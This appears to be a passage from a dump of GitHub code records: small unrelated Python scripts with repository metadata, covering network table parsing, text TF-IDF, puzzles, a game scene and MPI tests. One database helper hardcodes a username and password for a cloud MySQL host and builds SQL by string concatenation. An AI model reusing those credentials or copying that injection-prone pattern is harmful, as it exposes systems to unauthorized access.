------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n","repo_name":"nie01/pyboo","sub_path":"iDatabase.py","file_name":"iDatabase.py","file_ext":"py","file_size_in_byte":14105,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"41499965220","text":"#!/usr/bin/python3\n\nfh = open('/home/gcave/Dropbox/cam.txt')\nfarp = open('/home/gcave/Dropbox/arp-ddc.txt')\n\nlst = []\nl4_lst = []\nsort_lst = []\n\ndef build_tup(*a):\n    '''\n    get Vlan, MAC, interface, IP wildcard\n    '''\n    return a\n\ndef getKey(item):\n    '''\n    Change to sort different fields\n    vlan=0, mac=1, interface=2, IP=-1 \n    '''\n    return item[-1]\n\n# Assemble the CAM table\nfor line in fh:\n    if not line.startswith('*'):\n        continue\n    line = line.split()\n\n    if not line[3] == 'dynamic':\n        continue\n    if line[-1].startswith('G'):\n        vlan = line[1]\n        mac = line[2]\n        interface = line[-1]\n        switch = build_tup(vlan, mac, interface)\n        lst.append(switch)\n\n# Assemble the ARP table \nfor arp_lst in farp:\n    if not arp_lst.startswith('Internet'):\n        continue\n    arp_lst = arp_lst.split()\n    if arp_lst[3] == 'Incomplete':\n        continue\n    else:\n        l4 = arp_lst[1]\n        arp_mac = arp_lst[-3]\n        arp = build_tup(l4, arp_mac)\n        l4_lst.append(arp)\n\n# Verify ARP entry in CAM table\nfor i in lst:\n    t0 = i[1]\n    for j in l4_lst:\n        t1 =(j[-1])\n        if t0 in t1:\n            vlan = i[0]\n            mac_addr = i[1].upper()\n            interface = i[2]\n            ip_addr = j[0]\n            switch = build_tup(vlan, mac_addr, interface, ip_addr)\n            sort_lst.append(switch)\n\n#Sort tuples by field\ns = sorted(sort_lst, key=getKey)\n\n# Print sorted list\nfor i in s:\n    vlan = i[0]\n    mac_addr = i[1]\n    interface = i[2]\n    ip_addr = i[-1]\n    print('IP:%s \\tMAC:%s \\tInterface:%s \\tVlan%s'%(ip_addr, mac_addr, interface, vlan))\n    # print('IP:' + ip_addr, '\\tMAC:' + mac_addr, 
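# --- aside: a hedged sketch, not part of mac-parse.py ---
# The nested CAM x ARP loops above run in O(len(lst) * len(l4_lst)). If both
# tables used the same MAC formatting, a dict keyed on MAC would make the join
# linear; the script itself falls back to a substring match because the two
# Cisco outputs format MACs differently, so treat this as an assumption.
def join_cam_arp(cam_rows, arp_rows):
    """cam_rows: (vlan, mac, interface) tuples; arp_rows: (ip, mac) tuples."""
    ip_by_mac = {mac: ip for ip, mac in arp_rows}          # one pass over ARP
    return [(vlan, mac.upper(), iface, ip_by_mac[mac])     # one pass over CAM
            for vlan, mac, iface in cam_rows if mac in ip_by_mac]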
\"\\tInterface:\" + interface, '\\tVlan'+ vlan)\n\n\n\n\n\n \n","repo_name":"gjcave/CISCO-ARP-CAM-PORTMAPPER","sub_path":"mac-parse.py","file_name":"mac-parse.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19260944202","text":"import main\n# https://bytebank.com/cambio?moedaOrigem=Real&quantidade=100&moedaDestino=Dolar\nurl = input(\"Entre com a url desejada: \")\nextrator = main.ExtratorURL(url)\n# extrator2 = main.ExtratorURL(url)\n# print(f'Tamanho da url: {len(extrator)}')\n# print(extrator)\n# print(extrator == extrator2)\nparam = input(\"Entre com o parametro que deseja o valor: \")\nvalor_quant = extrator.get_parametro(param)\nprint(valor_quant)\n","repo_name":"LucasCesarFerreira/Python","sub_path":"extratorURL/extrator_url.py","file_name":"extrator_url.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15646100836","text":"import numpy as np\r\nimport math\r\n\r\nfrom PIL import Image\r\n\r\ngscale1 = \"$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\\\"^`'. \"\r\n\r\ngscale2 = '@%#*+=-:. '\r\n\r\n#Average_light hjälpfunktion till Asciiconvert. Tar in en del av bild-filen med en brickas dimensioner som input. Output är ett genomsnitt av ljushet i en bricka. \r\ndef Average_light(image):\r\n\r\n\tim = np.array(image)\r\n \r\n\tw,h = im.shape\r\n \r\n\treturn np.average(im.reshape(w*h))\r\n\r\n\r\n#Asciiconvert funktionens Input: Bild-filen som skall konverteras, antal columner till ascii bilden, skalan ascii-bilden skall printas i, en boolean som bestämmer ascii-tecken paketet.\r\n#Asciiconvert funktionen bestämmer ascii-tecken för varje beräknad bricka i bilden och lägger till dem i en sträng för varje rad som läggs in i listan aimg. I loopen skickas en del av bilden med måtten av den beräknade brickan till hjälpfunktionen Average_light och får tillbaka ett värde på dess genomsnittliga ljushet. Värdet används för att välja korrekt tecken. \r\n#Asciiconvert funktionen output: Listan aimg som består av en sträng ascii-tecken per rad. \r\ndef Asciiconvert(imgFile, columns, scale, moreLevels):\r\n \r\n\tglobal gscale1, gscale2\r\n\r\n\timage = Image.open(imgFile).convert('L')\r\n\r\n\tW, H = image.size[0], image.size[1]\r\n\tprint(\"input image dims: %d x %d\" % (W, H))\r\n\r\n\tw = W/columns\r\n \r\n\th = w/scale\r\n \r\n\trows = int(H/h)\r\n\t\r\n\tprint(\"columns: %d, rows: %d\" % (columns, rows))\r\n\tprint(\"tile dims: %d x %d\" % (w, h))\r\n\r\n\tif columns > W or rows > H:\r\n\t\tprint(\"Image too small for specified columns!\")\r\n\t\texit(0)\r\n\r\n\taimg = []\r\n\r\n\tfor j in range(rows):\r\n\t\ty1 = int(j*h)\r\n\t\ty2 = int((j+1)*h)\r\n\t\tif j == rows-1:\r\n\t\t\ty2 = H\r\n\r\n\t\taimg.append(\"\")\r\n \r\n\t\tfor i in range(columns):\r\n\r\n\t\t\tx1 = int(i*w)\r\n\t\t\tx2 = int((i+1)*w)\r\n\r\n\t\t\tif i == columns-1:\r\n\t\t\t\tx2 = W\r\n\r\n\t\t\timg = image.crop((x1, y1, x2, y2))\r\n \r\n\t\t\tavg = int(Average_light(img))\r\n\t\t\tif moreLevels:\r\n\t\t\t\tgsval = gscale1[int((avg*69)/255)]\r\n\t\t\telse:\r\n\t\t\t\tgsval = gscale2[int((avg*9)/255)]\r\n\r\n\t\t\taimg[j] += gsval\r\n\t\t\t\r\n\t\r\n\treturn aimg\r\n\r\n#main funktionen är den interaktiva delen av programmet. Den tar input från användaren i form av bild-fil, skala, antal columner och en boolean för vilket tecken-packet som används. 
Main funktionen kallar även på Asciiconvert funktionen, öppnar output-filen och skriver ut aimg-listan rad för rad. \r\ndef main(): \r\n\timgFile = input(\"Paste IMG file here: \\n\")\r\n \t\t\t\r\n\tscale = input(\"Input scale in decimals or press Enter for standard settings: \\n\")\r\n\tif scale == '':\r\n\t\tscale = 0.43\r\n\telse:\r\n\t\tscale = float(scale)\r\n\t\r\n\t\r\n\t\r\n\toutFile = input(\"Input wanted output file or press ENTER for standard settings: \\n\")\r\n\tif outFile == '':\r\n\t\toutFile = 'out.txt'\r\n\t\r\n\tcolumns = input(\"Input number of columns or press ENTER for standard settings: \\n\")\r\n\tif columns == '':\r\n\t\tcolumns = 100\r\n\telse:\r\n\t\tcolumns = int(columns)\r\n \r\n\tmoreLevels = input(\"Input HIGH for more levels of gray scale or press ENTER for standard grayscale \\n\")\r\n\tif moreLevels == '':\r\n\t\tmoreLevels = False\r\n\telif moreLevels == 'HIGH':\r\n\t\tmoreLevels = True\r\n\telif moreLevels == 'high':\r\n\t\tmoreLevels = True\r\n\telse:\r\n\t\tprint(\"Input incorrect. Follow the instructions or the program will not funktion properly \\n\")\r\n\t\texit(0)\r\n\r\n\tprint('generating ASCII art...')\r\n\t\r\n\taimg = Asciiconvert(imgFile, columns, scale, moreLevels)\r\n\r\n\tf = open(outFile, 'w')\r\n\r\n\tfor row in aimg:\r\n\t\tf.write(row + '\\n')\r\n\r\n\tf.close()\r\n\tprint(\"ASCII art written to %s\" % outFile)\r\n\r\n#kallar på main funktionen\r\nmain()\r\n","repo_name":"EmilCrogard/Ascii_art","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9148053445","text":"def fib(n):\r\n assert n >= 0\r\n\r\n f = [0, 1] + [None] * (n - 1)\r\n\r\n for i in range(2, n + 1):\r\n f[i] = f[i - 1] + f[i - 2]\r\n\r\n return f[n]\r\n\r\n\r\nN, M = map(int, input().split())\r\nA = [int(input()) for _ in range(M)]\r\n\r\nA = [-1] + A + [N + 1]\r\nB = []\r\nfor a1, a2 in zip(A[:-1], A[1:]):\r\n n = a2 - a1 - 2\r\n if n >= 0:\r\n B.append(n)\r\n else:\r\n print(0)\r\n break\r\nelse:\r\n ans = 1\r\n for b in B:\r\n ans *= fib(b + 1)\r\n ans %= 10 ** 9 + 7\r\n print(ans)\r\n","repo_name":"mikiya1130/AtCoder","sub_path":"field/contests/abc129/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39384097137","text":"from kite_text_source import kite_text, kite_history\nfrom nltk.tokenize import TreebankWordTokenizer\nfrom collections import Counter\nfrom collections import OrderedDict\nimport copy\n\ntokenizer = TreebankWordTokenizer()\n\nkite_intro = kite_text.lower()\nintro_tokens = tokenizer.tokenize(kite_intro)\n\nkite_history = kite_history.lower()\nhistory_tokens = tokenizer.tokenize(kite_history)\n\nintro_total = len(intro_tokens)\nhistory_total = len(history_tokens)\nprint('intro total:', intro_total)\nprint('history total:', history_total)\n\nintro_tf = {}\nhistory_tf = {}\n\nintro_counts = Counter(intro_tokens)\nintro_tf['kite'] = intro_counts['kite'] / intro_total\n\nhistory_counts = Counter(history_tokens)\nhistory_tf['kite'] = history_counts['kite'] / history_total\n\nprint(\"Term Frequency of 'kite' in intro is: {:.4f}\".format(intro_tf['kite']))\nprint(\"Term Frequency of 'kite' in history is: {:.4f}\".format(history_tf['kite']))\n\n# compare it with word 'and'\nintro_tf['and'] = intro_counts['and'] / intro_total\nhistory_tf['and'] = history_counts['and'] / 
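# --- aside: a hedged sketch, not part of e4_topik_modeling.py ---
# The lines around this point implement tf(t, d) = count(t, d) / len(d) and,
# further down, idf(t, D) = N / n_t without the usual log damping. A
# log-scaled variant for comparison (all names are illustrative):
import math

def tfidf(term, doc, corpus):
    """doc: list of tokens; corpus: list of token lists."""
    tf = doc.count(term) / len(doc)
    n_t = sum(1 for d in corpus if term in d)
    return tf * math.log(len(corpus) / n_t) if n_t else 0.0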
history_total\nprint(\"\\nCompare it with word 'and':\")\nprint(\"Term Frequency of 'and' in intro is: {:.4f}\".format(intro_tf['and']))\nprint(\"Term Frequency of 'and' in history is: {:.4f}\".format(history_tf['and']))\n\nnum_docs_containing_and = 0\nnum_docs_containing_kite = 0\nnum_docs_containing_china = 0\nfor doc in [intro_tokens, history_tokens]:\n if 'and' in doc:\n num_docs_containing_and += 1\n if 'kite' in doc:\n num_docs_containing_kite += 1\n if 'china' in doc:\n num_docs_containing_china += 1\n\nintro_tf['china'] = intro_counts['china'] / intro_total\nhistory_tf['china'] = history_counts['china'] / history_total\n\nnum_docs = 2\nintro_idf = {}\nhistory_idf = {}\n\nintro_idf['and'] = num_docs / num_docs_containing_and\nhistory_idf['and'] = num_docs / num_docs_containing_and\n\nintro_idf['kite'] = num_docs / num_docs_containing_kite\nhistory_idf['kite'] = num_docs / num_docs_containing_kite\n\nintro_idf['china'] = num_docs / num_docs_containing_china\nhistory_idf['china'] = num_docs / num_docs_containing_china\n\nintro_tfidf = {}\nintro_tfidf['and'] = intro_tf['and'] * intro_idf['and']\nintro_tfidf['kite'] = intro_tf['kite'] * intro_idf['kite']\nintro_tfidf['china'] = intro_tf['china'] * intro_idf['china']\n\nhistory_tfidf = {}\nhistory_tfidf['and'] = history_tf['and'] * history_idf['and']\nhistory_tfidf['kite'] = history_tf['kite'] * history_idf['kite']\nhistory_tfidf['china'] = history_tf['china'] * history_idf['china']\n\n# t - term, d - document, D - corpus\n# tf(t, d) = count(t) / count(d)\n# idf(t, D) = log (number of documents / number of documents containing t)\n# tfidf(t, d, D) = tf(t, d) * idf(t, D)\n#\n# log_tf = log(term_occurrences_in_doc) - log(num_terms_in_doc)\n# log_log_idf = log(log(total_num_docs) - log(num_docs_containing_term))\n# log_tf_idf = log_tf + log_idf\n\nprint('\\n\\n\\n>>> RELEVANCE RANKING')\ndocs = [kite_intro, kite_history]\n\ndoc_tokens = []\nfor doc in docs:\n doc_tokens += [sorted(tokenizer.tokenize(doc.lower()))]\nprint(\"Len doc_tokens[0]:\", len(doc_tokens[0]))\n\nall_doc_tokens = sum(doc_tokens, [])\nprint(\"Len all_doc_tokens:\", len(all_doc_tokens))\n\nlexicon = sorted((set(all_doc_tokens)))\nprint(\"Len lexicon:\", len(lexicon))\nprint(lexicon)\n\nzero_vector = OrderedDict((token, 0) for token in lexicon)\n\ndocument_tfidf_vectors = []\nfor doc in docs:\n vec = copy.copy(zero_vector)\n tokens = tokenizer.tokenize(doc.lower())\n token_counts = Counter(tokens)\n\n for key, value in token_counts.items():\n docs_containing_key = 0\n for _doc in docs:\n if key in _doc:\n docs_containing_key += 1\n tf = value / len(lexicon)\n if docs_containing_key:\n idf = len(docs) / docs_containing_key\n else:\n idf = 0\n vec[key] = tf * idf\n document_tfidf_vectors.append(vec)\n\n# print(document_tfidf_vectors)\nprint('cosine similarity')\n\nfrom e2_compute_cosine_similarity import cosine_sim\n\nprint('len documents_tfidf_vectors:', len(document_tfidf_vectors))\nprint(cosine_sim(document_tfidf_vectors[0], document_tfidf_vectors[1]))\n\n","repo_name":"VolDonets/natural_language_processing","sub_path":"part_2/e4_topik_modeling.py","file_name":"e4_topik_modeling.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42903077197","text":"import numpy as np\nimport pandas as pd\nimport sklearn as sk\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import train_test_split\nfrom 
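# --- aside: a hedged sketch of a helper this dump does not include ---
# e4_topik_modeling.py imports cosine_sim from e2_compute_cosine_similarity;
# a minimal implementation consistent with its use on two equally-keyed
# OrderedDict tf-idf vectors might look like:
import math

def cosine_sim(vec1, vec2):
    dot = sum(a * b for a, b in zip(vec1.values(), vec2.values()))
    norm = math.sqrt(sum(a * a for a in vec1.values()))
    norm *= math.sqrt(sum(b * b for b in vec2.values()))
    return dot / norm if norm else 0.0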
sklearn.metrics import mean_squared_error , precision_score,accuracy_score,f1_score,recall_score\n\ndf = pd.read_csv(\"heart.csv\")\n\n\nX = df.drop(['target'],axis =1)\ny = df['target']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y,stratify = y)\n\nmodel = DecisionTreeClassifier()\nmodel.fit(X_train,y_train)\npred = model.predict(X_test) \n\nscores = cross_val_score(DecisionTreeClassifier(),X,y,cv= 5)\nprint(\"The score of cross_validiation_score :\")\nprint(\" %.3f \" % scores.mean())\n\nprint(\"Precision : \",end=\" \")\nprint(\" %.3f \" % precision_score(y_test,pred))\n\nprint(\"Accuracy :\",end=\" \")\nprint(\" %.3f \" % accuracy_score(y_test,pred))\n\nprint(\"recall score :\",end=\" \")\nprint(\" %.3f \" % recall_score(y_test,pred))\n\nprint(\"f1_score :\",end=\" \")\nprint(\" %.3f \" % f1_score(y_test,pred))\n\n","repo_name":"sunny567s35/Bagging_Fuzzy_GBDT_Algorithm","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17411695694","text":"class Solution:\n # @param A : tuple of integers\n # @param B : tuple of integers\n # @return a list of integers\n def intersect(self, A, B):\n ans = []\n A_pointer = 0\n B_pointer = 0\n while A_pointer < len(A) and B_pointer < len(B):\n if A[A_pointer] == B[B_pointer]:\n ans.append(A[A_pointer])\n A_pointer += 1\n B_pointer += 1\n\n elif A[A_pointer] < B[B_pointer]:\n A_pointer += 1\n\n else:\n B_pointer += 1\n\n return ans\n\n\nif __name__ == '__main__':\n A= [1, 2, 3, 3, 4, 5, 6]\n B= [3, 3, 5]\n print(Solution().intersect(A, B))","repo_name":"avirupdandapat/ALGOPROJECT","sub_path":"intersectofsortarr.py","file_name":"intersectofsortarr.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72107155308","text":"import os\n\nfrom utils.env_config import load_yaml_env_config\nfrom utils.constants import DEFAULT_ENV_CONFIG_FILEPATH, LIST_ENV_VARS\n\n\ndef initialize_env() -> None:\n \"\"\"\n Initialize the environment variables for HuggingFace and WandB.\n \n By default, the environment variables are loaded from the file `configs/env_config.yaml`.\n One can also specify the path to the config file using the environment variable `ENV_CONFIG_FILEPATH`.\n \"\"\"\n env_config_filepath = os.environ.get(\"ENV_CONFIG_FILEPATH\", DEFAULT_ENV_CONFIG_FILEPATH)\n env_config = load_yaml_env_config(env_config_filepath)\n \n for var in LIST_ENV_VARS:\n if getattr(env_config, var) is not None:\n os.environ[var] = getattr(env_config, var)\n \n return\n\n\ndef print_envs() -> None:\n for env in LIST_ENV_VARS:\n print(f\"{env}: {os.environ.get(env, None)}\")\n return\n","repo_name":"tonywu71/distilling-and-forgetting-in-large-pre-trained-models","sub_path":"utils/initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34444697620","text":"import gensim\nimport numpy as np\nimport spacy\nfrom spacy import displacy\nfrom gensim.corpora import Dictionary\nfrom gensim.models import LdaModel\nimport matplotlib.pyplot as plt\nimport sklearn\n# import keras\n# file =input()\nfile=input()\nfile_handle=open(file,'r')\nfile_handle.readline()\nprint(\"issue_id~stam_let\")\nnlp = spacy.load('en_core_web_sm')\n\nfor line in file_handle:\n a,text=line.split(\"~\",1)\n 
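# --- aside: a hedged note on the two-pointer intersect above ---
# Solution.intersect runs in O(len(A) + len(B)) on sorted inputs and keeps
# duplicates ([3, 3] for the sample). When only unique values matter, sets
# are simpler at the cost of dropping multiplicity:
def intersect_unique(A, B):
    return sorted(set(A) & set(B))

assert intersect_unique((1, 2, 3, 3, 4, 5, 6), (3, 3, 5)) == [3, 5]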
text=text[:-1]\n text=' '.join(text.split('\\n'))\n text=' '.join(text.split())\n text=text+\"\\n\"\n # print(text)\n\n doc = nlp(text.lower())\n # print(doc)\n # sent = nlp(u\"Tom ran to the repair shop to fix his bicycle.\")\n\n\n # for token in sent:\n # print(token.text, token.pos_, token.tag_)\n\n\n # we add some words to the stop word list\n texts, article = [], []\n for w in doc:\n # if it's not a stop word or punctuation mark, add it to our article!\n if w.text != '\\n' and not w.is_stop and not w.is_punct and not w.like_num and w.text != 'I':\n # we add the lematized version of the word\n article.append(w.lemma_)\n # if it's a new line, it means we're onto our next document\n if w.text == '\\n':\n texts.append(article)\n article = []\n print(a,end=\"~\")\n for i in texts:\n for j in i:\n print(j,end=\" \")\n print()\n","repo_name":"atreytushar11/Research_SOE-1","sub_path":"Topic/stam_let.py","file_name":"stam_let.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42759135228","text":"# read numbers from inputs.txt and count the number of times they increase\ndef main():\n with open('inputs/inputs5.txt') as f:\n # read file without newline characters\n data = f.read().splitlines()\n # every line is of form x1,y1 -> x2,y2 read it into numbers\n numbers = []\n for line in data:\n numbers.append(list(map(lambda x: tuple(map(int, x.split(','))), line.split(' -> '))))\n print(f'Part 1: {part1(numbers)}')\n # print(f'Part 2: {part2(tables, numbers)}') \n\n\ndef part1(lines):\n board = bounds(lines)\n for line in lines:\n x, y = line\n x1, y1 = x\n x2, y2 = y\n board[y2][x2] += 1\n while x1 != x2 or y1 != y2:\n board[y1][x1] += 1\n x1 += 1 if x2 > x1 else 0 if x1 == x2 else -1\n y1 += 1 if y2 > y1 else 0 if y1 == y2 else -1 \n c = sum([1 for x in board for y in x if y > 1])\n return c\n\n \n# find the bounds of the 2d array of lines given coordinates\ndef bounds(lines):\n xmax = max([max(x[0][0], x[1][0]) for x in lines])\n ymax = max([max(x[0][1], x[1][1]) for x in lines])\n # make 2d array of zeros with bounds\n board = [[0 for x in range(xmax+1)] for y in range(ymax+1)]\n # print(xmax, ymax)\n return board\n \n# def hlep(line):\n# x, y = line\n# x1, y1 = x\n# x2, y2 = y\n# if x1 == x2:\n# return \"v\"\n# elif y1 == y2:\n# return \"h\"\n# else:\n# return \"d\"\n\n\ndef part2(boards, numbers):\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"aadibajpai/advent","sub_path":"2021/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74652401387","text":"import pymysql\nimport datetime\n\n\nclass DB:\n def __init__(self):\n self.db = None\n self.today = None\n self.init()\n\n def init(self):\n self.today = datetime.datetime.now().date()\n self.connect()\n\n # connect to database\n def connect(self):\n times = 0\n N = 10\n while times < N:\n try:\n self.db = pymysql.connect(\"class568.cgzotjrssahz.us-east-1.rds.amazonaws.com\", \"ryan\", \"11111111\", \"stock\")\n break\n except:\n print('hh')\n times += 1\n\n # insert one row in related table\n def insert(self, tableName, row):\n sql = 'insert into ' + tableName + ' values('\n for item in row:\n sql += repr(item) + ','\n sql = sql[:-1]\n sql += ');'\n print(sql)\n try:\n cursor = self.db.cursor()\n cursor.execute(sql)\n self.db.commit()\n cursor.close()\n except:\n self.db.rollback()\n\n # delete 
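# --- aside: a hedged sketch, not part of day5.py above or the db helper in progress ---
# day5.py allocates a dense xmax*ymax board; a Counter over visited points
# needs memory proportional only to covered cells and handles the same
# horizontal/vertical/45-degree lines:
from collections import Counter

def count_overlaps(lines):
    hits = Counter()
    for (x1, y1), (x2, y2) in lines:
        dx = (x2 > x1) - (x2 < x1)   # step sign: -1, 0 or 1
        dy = (y2 > y1) - (y2 < y1)
        for i in range(max(abs(x2 - x1), abs(y2 - y1)) + 1):
            hits[(x1 + i * dx, y1 + i * dy)] += 1
    return sum(1 for c in hits.values() if c > 1)

assert count_overlaps([((0, 9), (5, 9)), ((0, 9), (2, 9))]) == 3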
all data in realtime table\n def delete_realtime(self):\n cur = datetime.datetime.now().date()\n if cur == self.today:\n return None\n sql = 'delete from RealTimePrice;'\n try:\n cursor = self.db.cursor()\n cursor.execute(sql)\n self.db.commit()\n cursor.close()\n except:\n print('hhh')\n self.db.rollback()\n finally:\n self.today = cur\n\n # delete all data in history table\n def delete_history(self):\n cur = datetime.datetime.now().date()\n if cur == self.today:\n return None\n earliest_date = str(datetime.date(cur.year - 1, cur.month, cur.day))\n sql = 'delete from HistoryPrice where historyTime < {};'.format(earliest_date)\n print(sql)\n try:\n cursor = self.db.cursor()\n cursor.execute(sql)\n self.db.commit()\n cursor.close()\n except:\n print('hhh')\n self.db.rollback()\n finally:\n self.today = cur\n\n def delete(self):\n self.delete_realtime()\n self.delete_history()\n\nif __name__ == '__main__':\n db = DB()\n # table = 'HistoryPrice'\n # row = ['sys-0','2017-10-09','27','89','128','21','1321']\n # db.insert(table,row)\n # table = 'RealTimePrice'\n # row = ['sys-0', '23:12:12', '80','1208']\n # db.insert(table,row)\n db.delete()\n\n","repo_name":"hengshaochen/airline_booking_system","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43285132513","text":"import numpy as np\nfrom keras import backend as K\nfrom keras.losses import mean_absolute_error\n\nfrom losses import ssim, photometric_consistency_loss\n\nx = np.ones((1, 10, 10, 1))\ny = np.ones((1, 10, 10, 1))\n\nx_img1 = K.variable(x)\ny_img1 = K.variable(y)\n\nssim1 = ssim(x_img1, y_img1)\n\nassert K.eval(ssim1).all() == np.zeros((1, 10, 10)).all()\n\nx_img2 = K.variable(255*x)\ny_img2 = K.variable(-255*y)\n\nssim2 = ssim(x_img2, y_img2)\n\nassert K.eval(ssim2).all() == np.ones((1, 10, 10)).all()\n\npcl = photometric_consistency_loss(x_img1, y_img1)\n\nassert K.eval(pcl).all() == np.zeros((1, 10, 10)).all()","repo_name":"maj-personal-repos/UnDeepVO","sub_path":"losses_test.py","file_name":"losses_test.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"37"} +{"seq_id":"73154599467","text":"from PyQt5.QtWidgets import QGraphicsScene, QGraphicsView, QWidget\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import QSize, QTimer, Qt\n\nfrom gui import GUI\nfrom ending import Ending\n\n\nclass World(QGraphicsScene):\n \"\"\"Here we set up the graphics view and timer for it. 
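# --- aside: a hedged note on the assertions in losses_test.py above ---
# assert a.all() == b.all() compares two scalar booleans, so it can pass even
# when the arrays differ elementwise; numpy's testing helpers fail loudly and
# report the mismatch instead:
import numpy as np
expected = np.zeros((1, 10, 10))
actual = np.zeros((1, 10, 10))
np.testing.assert_allclose(actual, expected, atol=1e-6)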
We visualize the items that are\n put on the scene in the GUI class and take in the keypressevents.\"\"\"\n\n def __init__(self, menu, levelfile):\n super().__init__()\n self.gui = GUI(self)\n self.menu = menu\n self.levelmap = levelfile\n self.keys = set()\n\n self.x = 0\n self.y = 0\n self.window = None\n\n self.treasure = None\n self.ground_blocks = []\n self.enemies = []\n self.traps = []\n self.fox = None\n\n self.level_view()\n\n self.timer = QTimer(self)\n self.timer.start(10)\n self.timer.timeout.connect(self.window_update)\n\n def level_view(self):\n self.x, self.y = self.gui.create_map(self.levelmap)\n self.window = QGraphicsView(self)\n self.window.setWindowFlags(Qt.FramelessWindowHint)\n self.window.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.window.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n self.window.setFixedSize(1500, 800)\n self.setSceneRect(0, 0, self.x*100, self.y*100)\n\n self.window.setStyleSheet(''' color: none; background-image: url(./src/graphics/level1_background.png); border: none;''')\n\n self.window.show()\n\n def keyPressEvent(self, e):\n self.keys.add(e.key())\n\n def keyReleaseEvent(self, e):\n self.keys.remove(e.key())\n\n def window_update(self):\n self.update()\n for enemy in self.enemies:\n enemy.update_position()\n self.fox.update_position(self.keys)\n self.window.centerOn(self.fox.pos())\n\n def loss_victory(self, background):\n ending = Ending(self.menu, background)\n position = self.window.mapToScene(350, 0)\n ending.move(position.toPoint())\n self.addWidget(ending, Qt.Widget)","repo_name":"EssiTallgren/fox-burglar","sub_path":"src/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21636574728","text":"from mpi.lib.hostfile.parser import parse_hostfile\nfrom mpi.lib.hostfile.mappers import round_robin, HostfileMapException \n\n__all__ = (\"parse_hostfile\", \"round_robin\" )\n\nimport unittest\n\nclass TestRoundRobin(unittest.TestCase):\n \n def setUp(self):\n # Generate a bunch of fake hostfile data. 
Just for fun\n        self.hostfile_info = []\n        procs = 40\n        for i in range(procs):\n            self.hostfile_info.append({'host' : \"myhost%d\" % i, 'cpu' : 2, 'max_cpu' : 4})\n\n    def test_invalid_overmapping(self):\n        # 4 actual CPUs, each overmapping by 4 = 16 virtual\n        self.assertRaises(HostfileMapException, round_robin, self.hostfile_info, 4, 16, 17, False)\n    \n    def test_more_cpus_than_ranks(self):\n        expected_data = [('myhost0', 0), ('myhost1', 1), ('myhost2', 2), ('myhost3', 3)]\n        data = round_robin(self.hostfile_info[:4], 8, 16, 4, False)\n        self.assertEquals(data, expected_data)\n\n    def test_overmapping(self):\n        data = round_robin(self.hostfile_info[:2], 4, 8, 8, True)\n        expected_data = [('myhost0', 0), ('myhost1', 1), ('myhost0', 2), ('myhost1', 3), ('myhost0', 4), ('myhost1', 5), ('myhost0', 6), ('myhost1', 7)]\n        self.assertEquals(data, expected_data)\n\n    def test_nodata(self):\n        data = round_robin([], 0, 0, 8, True)\n        expected_data = [('localhost', 0), ('localhost', 1), ('localhost', 2), ('localhost', 3), ('localhost', 4), ('localhost', 5), ('localhost', 6), ('localhost', 7)]\n        self.assertEquals(data, expected_data)\n    \nif __name__ == '__main__':\n    unittest.main()","repo_name":"jamitzky/pupyMPI","sub_path":"pupympi/mpi/lib/hostfile/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
